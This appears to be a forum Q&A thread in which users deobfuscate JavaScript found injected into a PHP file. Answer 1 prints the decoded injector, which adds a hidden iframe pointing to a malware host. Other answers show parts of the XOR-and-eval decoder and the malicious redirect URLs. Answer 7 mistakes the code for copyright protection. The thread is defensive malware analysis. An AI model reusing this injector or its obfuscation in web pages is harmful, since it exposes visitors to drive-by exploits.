Question:
I've got some JavaScript code that was at the bottom of a PHP file. It goes through lots of weird contortions, like converting hex to ASCII, then doing regex replacements, executing code and so on...
Is there any way to find out what it's executing before it actually does it?
The code is here:
http://pastebin.ca/1303597
Answer 1:
You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.
I'll have a look and see what comes up.
Edit: I've got through most of it. The final step seems to be non-trivial, probably because it involves "arguments.callee". Anyway I've put up what I have so far on Pastebin.
Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependent parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.
Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:
function EvilInstaller(){};
EvilInstaller.prototype = {
getFrameURL : function() {
var dlh=document.location.host;
return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
},
path:'/elanguage.cn/',
cookieValue:1,
setCookie : function(name, value) {
var d= new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
},
install : function() {
if (!this.alreadyInstalled()) {
var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>"
try {
document.open();
document.write(s);
document.close();
}
catch(e) {
document.write("<html><body>" + s + "</body></html>")
}
this.setCookie(this.cookieName, this.cookieValue);
}
},
getRandString : function() {
var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
var o='';
for (var i=0;i<l;i++) {
o+=c.substr(Math.floor(Math.random()*c.length),1,1);
}
return o;
},
cookieName:'hedcfagb',
host:'axa3.cn',
alreadyInstalled : function() {
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
}
};
var evil=new EvilInstaller();
evil.install();
Basically it looks like it loads malware from axa3.cn. The site is already suspected by the ISP though, so no telling what was actually there above and beyond general badness.
(If anyone's interested, I was using Pastebin as a pseudo-VCS for the changing versions of the code, so you can see another intermediate step, a little after my first edit post. It was quite intriguing seeing the different layers of obfuscation and how they changed.)
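As a side note on the decoded script: the odd-looking string in getRandString reduces to the sixteen hex digits once the filler characters are stripped, which is why the generated host names look like random hex. A minimal sketch of that step in isolation (the names hexDigits and randomLabel are mine, not the script's, and the random source is a parameter only so the behaviour can be checked):

```javascript
// Same literal and regex as in getRandString above: strip the filler characters.
const hexDigits = '0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');

// Hypothetical helper: build a label of `length` characters drawn from hexDigits.
function randomLabel(length, random = Math.random) {
  let out = '';
  for (let i = 0; i < length; i++) {
    out += hexDigits.charAt(Math.floor(random() * hexDigits.length));
  }
  return out;
}

console.log(hexDigits);        // 0123456789abcdef
console.log(randomLabel(16));  // 16 random hex characters
```

With an empty document.location.host (for example a page loaded from a local file), getFrameURL puts two such labels in front of the host, giving a URL of the form http://<16 hex>.<16 hex>.axa3.cn/elanguage.cn/.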
Answer 2:
Whilst you can decode manually, it can soon get tedious when you have many stages of decoding. I usually replace eval/write to see each step:
<script>
window.__eval= window.eval;
window.eval= function(s) { if (confirm('OK to eval? '+s)) return this.__eval(s); }
document.__write= document.write;
document.write= function(s) { if (confirm('OK to write? '+s)) return this.__write(s); }
</script>
However this particular script is protected against this by deliberate inspection of window.eval. Use of arguments.callee also means the script relies on a particular browser's Function.toString format, in this case IE's - it won't work on other browsers. You can put workarounds in the replacement eval function to give the script what it expects in this case, but it's still a bit of a pain.
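To illustrate why a check built on a function's own source text defeats ordinary cleanup, here is a small sketch. It is not the script's actual code: sourceChecksum and both sample functions are made up, and it uses a plain fn.toString() rather than arguments.callee so that it also runs in strict mode.

```javascript
// Hypothetical illustration: derive a number from a function's own source text.
function sourceChecksum(fn) {
  const src = fn.toString();
  let sum = 0;
  for (let i = 0; i < src.length; i++) {
    sum = (sum + src.charCodeAt(i)) % 65536;
  }
  return sum;
}

// Two functions with identical behaviour but different names in the source.
function original(a9Qz) { return a9Qz + 1; }
function renamed(value) { return value + 1; }

console.log(original(1) === renamed(1));                          // true
console.log(sourceChecksum(original) === sourceChecksum(renamed)); // false
```

A decoder that uses such a value as its key produces garbage as soon as the source is renamed or reformatted, and it inherits any differences in how a given browser prints function source.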
You could use the Script Debugger to step through the code, or what I did in this case was allow the code to run, in a virtual machine with no networking that I could afford to write off. By looking at document.body.innerHTML after the code had run I found it added an invisible iframe pointed at:
hxxp://62bc13b764ad2799.bbe4e7d3df5fdea8.axa3.cn/elanguage.cn/
which redirects to:
hxxp://google.com.upload.main.update.originalcn.cn/ebay.cn/index.php
which, viewed in suitable conditions in IE, gives you a load of exploits. Don't go to these URLs.
In short your server has been hacked by axa3.cn, one of the many Chinese-hosted but Russian-operated malware gangs in operation at the moment.
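If the page dump is large, the iframe can be picked out of the innerHTML string mechanically. A rough sketch, assuming the markup has been saved as a plain string; the function name and the example.invalid URL are placeholders, and a regex like this is only good enough for a quick look, not for parsing HTML in general:

```javascript
// Hypothetical helper: list the src attribute of every <iframe> in an HTML string.
function iframeSources(html) {
  const pattern = /<iframe\b[^>]*?\bsrc\s*=\s*(['"])(.*?)\1/gi;
  const sources = [];
  for (const match of html.matchAll(pattern)) {
    sources.push(match[2]); // group 2 is the text between the quotes
  }
  return sources;
}

// Placeholder markup in the same shape as the hidden frame the script writes.
const dump = "<div style='display:none'><iframe src='http://example.invalid/x/'></iframe></div>";
console.log(iframeSources(dump)); // [ 'http://example.invalid/x/' ]
```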
Answer 3:
Just write a Perl script or something that changes all escaped hex characters to ASCII? Then just look through the regexes to see what exactly is happening, and do the same thing with your Perl/whatever script.
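The same idea works in JavaScript instead of Perl. A minimal sketch, assuming the escapes are of the \xNN form (the function name is made up, and the sample string is just the word eval encoded by hand):

```javascript
// Replace every \xNN escape in the text with the character it encodes.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (whole, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// The backslashes are doubled so the sample holds literal \x sequences.
const sample = '\\x65\\x76\\x61\\x6c("...")';
console.log(decodeHexEscapes(sample)); // eval("...")
```

This only rewrites text and never executes it, so it is safe to run on the obfuscated source.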
Answer 4:
You can try the firebug console and break it down piecemeal. As a start:
var jQuery = eval('w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, ''));
is just masking the "eval" function as "jQuery"
Answer 5:
The easiest approach would be to simply use a small C program to convert the escaped hex characters into readable text, like so:
#include <stdio.h>
/* The compiler expands the escape sequences in the string literal for us. */
const char wtf[] = ""; // Really long string goes here
int main(void) {
    printf("%s\n", wtf);
    return 0;
}
which yields this (I added formatting). I'll let you finish off the last part which appears to be more of the same.
Answer 6:
very carefully - if someone is going to this much trouble to obfuscate the code, it is probably some kind of attack script
you can output the results of execution in stages using a local html file, and take it a piece at a time
doing this i get:
var jQuery = "eval(" +
'w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, '') +
");";
document.writeln('jQuery=' + jQuery);
which yields
jQuery=eval(window.eval);
which, as crescentfresh observed, binds the variable jQuery to the window.eval function.
the next section is obviously trying to eval something in hex code, so let's see what the hex code string looks like (reformatted manually for presentation purposes):
function g4LZ(s9QNvAL)
{
function eDdqkXm(fX09)
{
var uaWG=0;
var jtoS=fX09.length;
var aCD6=0;
while(aCD6wQ5.length)
d971I=0;
if(f234SD>lIXy6md.length)
f234SD=0;
kyCyJ+=String.fromCharCode(nCV2eO^ocx) + '';
}
eval(kyCyJ);
return kyCyJ=new String();
}
catch(e){}
}
g4LZ('%33...%5e');
and now we've got an escaped string at the end, let's see what's in there using unescape (truncated for presentation):
30248118GA0* l: WRG:nt9*82:)7Z\uF%*{...
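The unescaped text is still unreadable because the function above appears to XOR each character before calling eval. The exact key handling is not recoverable from the listing, so the following is only a generic sketch of XOR decoding with a repeating key; xorWithKey, the key and the sample text are all invented for illustration:

```javascript
// Generic repeating-key XOR over character codes (not the script's real routine).
function xorWithKey(text, key) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Stand-in for the escaped payload: XOR a harmless string, then escape it.
const encoded = escape(xorWithKey('alert(1)', 'k3y'));

// Decoding reverses both steps; XOR with the same key is its own inverse.
const decoded = xorWithKey(unescape(encoded), 'k3y');
console.log(decoded); // alert(1)
```

Printing the result instead of passing it to eval keeps the payload inert while you read it.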
frankly, i'm getting bored taking this apart, so instead i dumped it into a local html file, disconnected from the internet, opened firefox, disabled javascript, loaded the file in firefox, turned on firebug, reloaded the page so it would run, and inspected the DOM.
the script creates an IFRAME with SRC set to [altered for safety!]:
http://4b3b9e839fd84e47 [DO NOT CLICK THIS URL] .27f721b7f6c92d76.axa3.cn/elanguage.cn/
axa3.cn is a chinese domain on the malware blacklist
Answer 7:
I know it's not the answer, but usually (where I've seen this kind of stuff) such code is placed so that if that line isn't executed, the whole script stops. Why do they do that? Because it prints their copyright notice on the script (or, more usually, a template).
When people go to all that trouble to get recognition, it's because they sell a copyright-removal licence. I would recommend paying for it, since even if you "reverse engineer" the code, they can have (and do have) other ways to check whether your licence is valid. (Some of that software will actually send some kind of message if you tamper with it.)
But, before I get flamed, I agree it's interesting to dig into this kind of protection, recover the original code and break it =)